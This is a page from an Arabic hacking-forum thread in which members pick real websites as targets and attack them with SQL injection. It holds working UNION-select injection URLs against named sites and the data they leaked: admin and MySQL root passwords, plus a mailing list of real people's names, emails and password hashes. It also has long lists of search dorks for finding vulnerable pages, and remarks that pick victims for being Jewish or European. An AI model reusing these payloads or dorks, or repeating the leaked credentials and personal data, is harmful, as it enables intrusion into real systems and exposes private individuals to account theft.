:: vBspiders Professional Network ::
صفحة 9 من 11 « الأولى 78 9 1011
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   غرفة حقن قواعد البيانات {غرفة Sql } (http://www.vbspiders.com/vb/showthread.php?t=33334)

darkman.dz 08-10-2010 05:54 PM
ok
لكن قبل كل شيئ هذا موقع
أنا تأكدتمن أنه مصاب وكذلك وجدت أن عدد الأعمدة 9
لكن لم أجد الأعمدة المصابة
أعتقد أنها في ال source الخاص بالصفحة
و أنا لا أحب أبدا البحث فيه
لذلك سأهديه لكم
وها هو

كود:
http://www.pixheaven.net
وهذا به نفس المشكلة وعدد الأعمدة 3
كود:
http://mp3hungama.com
وهو موقع للغناء و المجون
ههههههههههههههههههههههههه
إذا هجوم

الشبح المرح 08-10-2010 06:30 PM
اخوي دارك مان

راح اشوف المشكلة ذي

darkman.dz 08-10-2010 06:36 PM
الشبح المرح
============
شكرا أخي
أنا و الله أكره و أمقت البحث في السورس الخاص بالصفحة عن نتيجة الإستعلام
لذا أرجو الأعضاء يستفيدو

darkman.dz 08-10-2010 10:25 PM
هل من جديد ؟؟

Master vbspiders 08-10-2010 10:51 PM
[align=center]ممممم كنت عمكتب موضوع...
ممم ما قدرت لا على الاول ولا على الثاني
وواضح انو ما قدر احد يحقنهم يدوي
لذلك راح اجرب الان البرامج
+
انتو ابحثو عن اهداف جديدة انا الان ارجع
+
شكرا دارك على الاهداف

تحياتي[/align]

Master vbspiders 08-11-2010 01:19 AM
[align=center]الموقع الاول ما لقيت فيها اي عمود خاص باليوزر او الباس
اما الثاني فيطلع معي اليوزرات هيك
0000
000004
00000006
وهيك اما الباس تبع اليوزر بيطلع عادي بس اليوزر خطا
جاري البحث عن هدف جديد...
تحياتي[/align]

agentsimo 08-11-2010 09:40 AM
اخواني هل يوجد برنامج اعطيه موقع و هو يبحت عن التغرة لي فيه
متلا اعطيه موقع www.xxx.com و هو يبحت و يجيب لي السكريب او سكرسبتات المصابة ب sql
و انا احقن

المهم كيف تهكرون موقع مستهدف اي ليس عندكم سكريبت المصاب و ترودون ان تحقنوه

ارجو الاجابة عن هده الاسالة و جزاكم الله خيرااا

medoo_mohamed 08-11-2010 01:46 PM
ممكن اضع هدف بعد اذنكم

هذا هو الهدف الجديد

http://new.katif.net

Master vbspiders 08-11-2010 02:16 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 191983)
اخواني هل يوجد برنامج اعطيه موقع و هو يبحت عن التغرة لي فيه
متلا اعطيه موقع www.xxx.com و هو يبحت و يجيب لي السكريب او سكرسبتات المصابة ب sql
و انا احقن

المهم كيف تهكرون موقع مستهدف اي ليس عندكم سكريبت المصاب و ترودون ان تحقنوه

ارجو الاجابة عن هده الاسالة و جزاكم الله خيرااا
[align=center]اها فهمت عليك اول شي افتح المتصفح وابحث كالتالي :
كود PHP:
www.xxx.com inurl:php 
وشو بيطلع معك سكربتات جربهم واحقن
تحياتي

[/align]

darkman.dz 08-11-2010 03:12 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة medoo_mohamed (المشاركة 192109)
ممكن اضع هدف بعد اذنكم

هذا هو الهدف الجديد

http://new.katif.net
جاري المحاولة أخي مع الموقع + هل قمت بحقنه مسبقا يدويا أو فقط قكت بإكتشاف الموقع مصاب فقمت بوضعه ؟؟

medoo_mohamed 08-11-2010 04:06 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 192214)
جاري المحاولة أخي مع الموقع + هل قمت بحقنه مسبقا يدويا أو فقط قكت بإكتشاف الموقع مصاب فقمت بوضعه ؟؟
نعم اخى تم حقنه مسبقا واستخراج اليوزر والباص

Master vbspiders 08-11-2010 04:14 PM
[align=center]تم الحقن...
هذا الباس :
كود PHP:
http://www.new.katif.net/text.php?page=-228+union+select+1,2,password,4,5+from+users-- 
الباس المشفر : a73daea6d27e7ad59e28f6cc023f61ad
الباس بعد فك التشفير : talgan

يوزر الادمن :
كود PHP:
http://www.new.katif.net/text.php?page=-228+union+select+1,2,username,4,5+from+users-- 
اليوزر : admin

لوحة الدخول : http://www.new.katif.net/login.php

بالتوفيق
تحياتي



[/align]

medoo_mohamed 08-11-2010 04:23 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة Master vbspiders (المشاركة 192250)
[align=center]تم الحقن...
هذا الباس :
كود PHP:
http://www.new.katif.net/text.php?page=-228+union+select+1,2,password,4,5+from+users-- 
الباس المشفر : a73daea6d27e7ad59e28f6cc023f61ad
الباس بعد فك التشفير : talgan

يوزر الادمن :
كود PHP:
http://www.new.katif.net/text.php?page=-228+union+select+1,2,username,4,5+from+users-- 
اليوزر : admin

لوحة الدخول : http://www.new.katif.net/login.php

بالتوفيق
تحياتي



[/align]

احسنت اخى

ياريت اخى دارك موقع فيه فلترة او فوربيدن نشتغل عليه شوية مع الاعضاء

منتظر الهدف الجديد

darkman.dz 08-11-2010 04:38 PM
كود:
أخي العزيز
أنا دخلت على الموقع اللي أنت حطيتو
لكن دخلن على الترجمة الإنجليزية
يعني الموقع الهدف
لكن بالإنجليزية وطلعت نتائج غير اللي طلعها خويا master vbspiders
وهذا هو الناتج

//////////////////////////////////////////////////////////////////////
====================================================================
/////////////////////////////////////////////////////////////////////////
*******************************************************/
**b1gmail_prefs:pop3_pass:katif_main****
*******************************************************
b1gmail_prefs:id:katif_main
b1gmail_prefs:pop3_user:katif_main
b1gmail_prefs:pop3_pass:katif_main
--------------------------------------
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,pop3_user,0x3a,pop3_pass%29,5,6,7,8+from+b1gmail_prefs--
--------------------------------------

1:elhanan:talgan

*********************************************
**maillist_maillist:mailPassword:katif_main**
*********************************************

maillist_maillist:id:katif_main
maillist_maillist:name:katif_main
___________________________________________
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name%29,5,6,7,8+from+maillist_maillist--
_________________________________________________


***********************************************
***maillist_maillistuser:password:katif_main***
***********************************************

maillist_maillistuser:id:katif_main
maillist_maillistuser:name:katif_main
maillist_maillistuser:email:katif_main
maillist_maillistuser:password:katif_main

________________________________________________________
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name,0x3a,email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--
___________________________________________________________

1876090728:katif.net:mailing@katif.net:194e4b797be164ae
1689980789:à ìçðï ñðãø:elhanan@katif.net:194e4b797be164ae
249739970:elhanans:elhanans@walla.co.il:2e686acb5ca7c2bd
612492932:yael mann:yaelimani@walla.co.il:04db499a1ad2582c
601390310:golansha:golansha@hotmail.com:1881ba4f105b73dd
2002102671:judy kamm:judyk@usa.com:609aa7377ab87166
157338937:atucker:atucker@isdn.net.il:7170ce2f04a1be06
804252561:eliav664:eliav664@walla.com:176a45fc06fbceee
944182215:éäåãä áøðéâø:yberniger@walla.co.il:525a34fa606b09b2
1279191856:y:aewz@walla.co.il:793225f547a317b6
1946549534:yy:aewz@walla.com:740ae2da5439e411
1848114356:Bentolila Shlomo:SH321@zahav.net.il:16e9f8c92a62d542
1873024935:menucha chwat:menu@zahav.net.il:78334b646f3efd35
680028509:äãñ åà åâãé ëäï:hadassc@bezeqint.net:7241591e0dfd4a2c
27004440:ala:alon@myquickmail.us:2f7bf62202815811
1555230481:shai biton:shaib11@gmail.com:6477aaca3a26de83
2007512475:daxy:hadaxy@yahoo.com:719aa9c20fc3d7ac
730880914:shimon333:olam@olam-jew.com:15c92b2




======================================================================================
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--
بالنسبة لهذا الأمر الأخير
فحبيت أحطلكم فقط إستعلامين
وهما الإيميل و الباس
و أرجو من الإخوة المحترفين في فك الهاشات فك هاته الهاشات مع إرفاق فيديو إن أمكن أو على الأقل
كتابة البرنامج المستعمل
وهاته كلها إيميلات يهودية
+
أنا خمنت لوحت التحكم لكن ما طلعت صحيحة

عبد الله ر 08-11-2010 04:40 PM
الله يعطيك العافية اخي ooooo_darkman_ooooo

darkman.dz 08-11-2010 04:41 PM
يعني أنا و الأخ Master vbspiders
إصطدنا عصفورين بحجر واحد
وجاري صيد الثالث

medoo_mohamed 08-11-2010 04:49 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo (المشاركة 192273)
كود:
أخي العزيز
أنا دخلت على الموقع اللي أنت حطيتو
لكن دخلن على الترجمة الإنجليزية
يعني الموقع الهدف
لكن بالإنجليزية وطلعت نتائج غير اللي طلعها خويا master vbspiders
وهذا هو الناتج

//////////////////////////////////////////////////////////////////////
====================================================================
/////////////////////////////////////////////////////////////////////////
*******************************************************/
**b1gmail_prefs:pop3_pass:katif_main****
*******************************************************
b1gmail_prefs:id:katif_main
b1gmail_prefs:pop3_user:katif_main
b1gmail_prefs:pop3_pass:katif_main
--------------------------------------
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,pop3_user,0x3a,pop3_pass%29,5,6,7,8+from+b1gmail_prefs--
--------------------------------------

1:elhanan:talgan

*********************************************
**maillist_maillist:mailPassword:katif_main**
*********************************************

maillist_maillist:id:katif_main
maillist_maillist:name:katif_main
___________________________________________
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name%29,5,6,7,8+from+maillist_maillist--
_________________________________________________


***********************************************
***maillist_maillistuser:password:katif_main***
***********************************************

maillist_maillistuser:id:katif_main
maillist_maillistuser:name:katif_main
maillist_maillistuser:email:katif_main
maillist_maillistuser:password:katif_main

________________________________________________________
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28id,0x3a,name,0x3a,email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--
___________________________________________________________

1876090728:katif.net:mailing@katif.net:194e4b797be164ae
1689980789:à ìçðï ñðãø:elhanan@katif.net:194e4b797be164ae
249739970:elhanans:elhanans@walla.co.il:2e686acb5ca7c2bd
612492932:yael mann:yaelimani@walla.co.il:04db499a1ad2582c
601390310:golansha:golansha@hotmail.com:1881ba4f105b73dd
2002102671:judy kamm:judyk@usa.com:609aa7377ab87166
157338937:atucker:atucker@isdn.net.il:7170ce2f04a1be06
804252561:eliav664:eliav664@walla.com:176a45fc06fbceee
944182215:éäåãä áøðéâø:yberniger@walla.co.il:525a34fa606b09b2
1279191856:y:aewz@walla.co.il:793225f547a317b6
1946549534:yy:aewz@walla.com:740ae2da5439e411
1848114356:Bentolila Shlomo:SH321@zahav.net.il:16e9f8c92a62d542
1873024935:menucha chwat:menu@zahav.net.il:78334b646f3efd35
680028509:äãñ åà åâãé ëäï:hadassc@bezeqint.net:7241591e0dfd4a2c
27004440:ala:alon@myquickmail.us:2f7bf62202815811
1555230481:shai biton:shaib11@gmail.com:6477aaca3a26de83
2007512475:daxy:hadaxy@yahoo.com:719aa9c20fc3d7ac
730880914:shimon333:olam@olam-jew.com:15c92b2




======================================================================================
http://english.katif.net/index.php?sub=-1%20union%20select%201,2,version%28%29,group_concat%28email,0x3a,password%29,5,6,7,8+from+maillist_maillistuser--
بالنسبة لهذا الأمر الأخير
فحبيت أحطلكم فقط إستعلامين
وهما الإيميل و الباس
و أرجو من الإخوة المحترفين في فك الهاشات فك هاته الهاشات مع إرفاق فيديو إن أمكن أو على الأقل
كتابة البرنامج المستعمل
وهاته كلها إيميلات يهودية
+
أنا خمنت لوحت التحكم لكن ما طلعت صحيحة

نعم اخى دارك ظهرت نتائج مختلفة للاختلاف قاعدة البيانات

Master vbspiders 08-11-2010 04:52 PM
[align=center]هههه الان جربت فعلا احول للغة الانجليزية
وفعلا فتح معي غير موقع هههه
بارك الله فيك اخي ooooo_darkman_ooooo
واصل
تحياتي لك
[/align]

Master vbspiders 08-11-2010 04:53 PM
[align=center]medoo_mohamed
شكرااا على الهدف
^_^
تحياتي[/align]

darkman.dz 08-11-2010 04:56 PM
Master vbspiders
===============
الله يبارك فيك خويا
---------------------------------
medoo_mohamed
أعلم هذا أخي
ومازال هناك أخرى ( .....أشك أنها أكثر من ثلاثة قواعد )

Master vbspiders 08-11-2010 05:12 PM
New sql injection dork
 
[align=center]دوركات جديدة من نوعها...
بالتوفيق
كود PHP:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id

وهذه دوركات لشوبينغ

كود PHP:
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?TextID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID

نريد هدف جديد عن طريق هالدوركات
^_*
تحياتي















[/align]

darkman.dz 08-11-2010 05:28 PM
Master vbspiders
شكرا أخي
الكريم

medoo_mohamed 08-11-2010 06:58 PM
الهدف الجديد

http://www.adas-fusion.eu

medoo_mohamed 08-11-2010 07:00 PM
هناك اربع قواعد بيانات لهذا الموقع اعتقد موقع استضافة

darkman.dz 08-11-2010 07:06 PM
جاري بإذن الله

darkman.dz 08-11-2010 07:10 PM
أخي العزيز medoo_mohamed
أعجبتني بعض الأشياء في هذا الهدف
وهي
1- هناك root
2- الموقع خفيف التصفح جدا
3- يحمل علم الإتحاد الأوروبي ههههههههههههههههههههههههههه
جاري المتابعة + هناك طريقة حقن جديدة ههههههههههه أنا أطبقها الآن

medoo_mohamed 08-11-2010 07:22 PM
ههههههههه فعلا علم الاتحاد الاوروبىلوحدة يغيظ علشان كده نشتغل عليه بذمة شوية هههههههههه

وجود الروت بتاعه عاجبنى بس للاسف باسوورد الروت مش راضى يطلع معرفش ليه

darkman.dz 08-11-2010 07:27 PM
تفضل أخي العزيز
كود:
http://www.adas-fusion.eu/theme.php?id=-4 UNION SELECT 1,2,3,group_concat(database(),0x3a,user(),0x3a,@@version),5,6--

database =  adas_eu
user = root@localhost
version = 5.0.45

tables =  task,theme,workpackage
=======================================
columns of "  workpackage " = id,theme,shortname,code,name,objective
columns of "theme"                  = id,code,shortname,name,description,science
columns of "task"                    = id,workpackage,shortname,description,revision,experiment,repeatnumber

والحقنة الأخيرة أتركها لكم لتركيبها كما تشاؤون وتتمكنو من تصفح كل العمواميد لأني  وضعت كل  نواتج إستعلامات الأعمدة
وشكرا

darkman.dz 08-11-2010 07:30 PM
هاته النتائج أنا طلعتها بواسطة طريقة حقن جديدة
هههههههههههههههههههههههههههههههههههههههه

darkman.dz 08-11-2010 07:35 PM
medoo_mohamed
أخي العزيز
أنا طلعت أشياء أخرى بطريقة أخرى
وجاري وضع الإستغلال كامل
------------------------
يوم رمضان هذا و الله مبارك علي
هههههههههههههههههه
تعلمت حوالي 50 شيئ في ظرف 3 ساعات

medoo_mohamed 08-11-2010 07:42 PM
احسنت اخى على الحقن بطرق جديدة ان شاء الله فى تقدم

وان شاء الله يستفيد الاعضاء اللى يدخلوا الموضوع ونستفاد معاهم

darkman.dz 08-11-2010 07:56 PM
medoo_mohamed
أخي العزيز
لم التالي
1- سحب باسوورد ويوزر الأدمن
2- الأعضاء ال 5 اللي معاه (ربما أدمن حتى هم )
3- إيجاد الهوست و الباس و اليوز للدحول بحساب root
هههههههههههههههههههههههههههههههههههههههههههههههه
الحمد لله
الآن أنا ذاهب في المساء سأعود وتكون النتائج أمامك
لأني مازال ملخمنتش لوحة التحكم + جاري الإطلاع على المواقع اللي على هذا السيرفر قبل عمل أي خطوة
لنا عودة في المساء بعد الإنتهاء من الرياضة
أنا خارج الآن

medoo_mohamed 08-11-2010 08:05 PM
وانا متواجد الليلة ان شاء الله وفيه اهداف جديدة

ترجع بالسلامة يا غالى

darkman.dz 08-11-2010 11:39 PM
تفضل أخي
الحقنة التي وعدتك بها
كود:
mantis_user_table:password:bugtracker
mantis_user_table:lost_password_request_count:bugtracker
user:password:cvs
user:Password:mysql
user:password:openuser
==============================
**********************************************************
**mantis_user_table:password:bugtracker**
**********************************************************
mantis_user_table:id:bugtracker
mantis_user_table:username:bugtracker
mantis_user_table:realname:bugtracker
mantis_user_table:email:bugtracker
mantis_user_table:password:bugtracker
********************************
***user:password:cvs***
********************************
user:id:cvs
user:fullname:cvs
user:username:cvs
user:password:cvs
user:auth:cvs

**************
for root****
**************
user:Host:mysql
user:User:mysql
user:Password:mysql

*************************************************
account of admin and the moderators
1:allan:apple123
2:oli:fefeef
3:mog:gom
4:nicholas:lom456ond
5:afoster:ofa
6:summers:mus
************************************
وهاته حقنة الحصول على حساب ال root
كود:
http://www.adas-fusion.eu/workpackage.php?id=-1%20UNION%20SELECT%201,2,3,4,concat%28user,0x3a,password%29,6+from+mysql.user--
:Great:

darkman.dz 08-11-2010 11:41 PM
+ أنا تفحصت الموقع
هوفقط المركب على السيرفر المحلي
بالإصاقة إلى موقعين أو ثلاثة تابعة لنفس الموقع

Master vbspiders 08-12-2010 12:17 AM
[align=center]ما يجيبها الا رجالها ابطال والله...
واصلو
تحياتي[/align]

NeTCaT-Ma 08-12-2010 12:35 AM
السلام عليكم شباب ممكن هدف سهل أتعلم عليه

Master vbspiders 08-12-2010 12:42 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة mr.tchach (المشاركة 192623)
السلام عليكم شباب ممكن هدف سهل أتعلم عليه
[align=center]جاري البحث...
تحياتي[/align]

darkman.dz 08-12-2010 12:43 AM
اقتباس:
المشاركة الأصلية كتبت بواسطة mr.tchach (المشاركة 192623)
السلام عليكم شباب ممكن هدف سهل أتعلم عليه
back to the old targets
and try to injecting it again
that's so easy to do
for can know your mistake
and for learn more about that

NeTCaT-Ma 08-12-2010 12:44 AM
شكرا لك أخي


الساعة الآن 03:45 PM
صفحة 9 من 11 « الأولى 78 9 1011
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0